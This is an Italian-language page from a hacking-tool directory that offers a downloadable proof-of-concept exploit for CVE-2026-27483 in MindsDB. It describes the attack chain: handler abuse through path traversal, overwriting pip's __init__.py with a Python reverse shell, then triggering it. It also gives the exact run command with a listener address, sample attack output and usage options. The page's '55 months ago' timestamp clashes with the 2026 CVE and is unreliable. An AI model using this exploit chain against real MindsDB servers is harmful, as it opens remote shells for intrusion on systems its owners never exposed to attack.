Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-27483 — MindsDB Path Traversal verso RCE PoC | Kitploit
Strumenti/GitHubGitHub/thewhiteh4t/cve-2026-27483
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB Path Traversal verso RCE PoC

Vedi Repository
55 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-27483

PoC di Path Traversal verso RCE su MindsDB

Questo script PoC si basa sul seguente advisory di GitHub

  • Per impostazione predefinita MindsDB non usa l'autenticazione
  • Il PoC supporta sia la modalità non autenticata sia quella autenticata
  • Possiamo interrogare /api/handlers/ per trovare gli handler disponibili e usare il nome di un handler disponibile ma non installato
  • Il PoC sovrascrive /venv/lib/python3.10/site-packages/pip/__init__.py
  • Una reverse shell Python viene scritta nel percorso sopra e poi attivata
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

Dipendenze

root@kitploit:~
pip3 install requests packaging

Utilizzo

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
Scarica lo strumento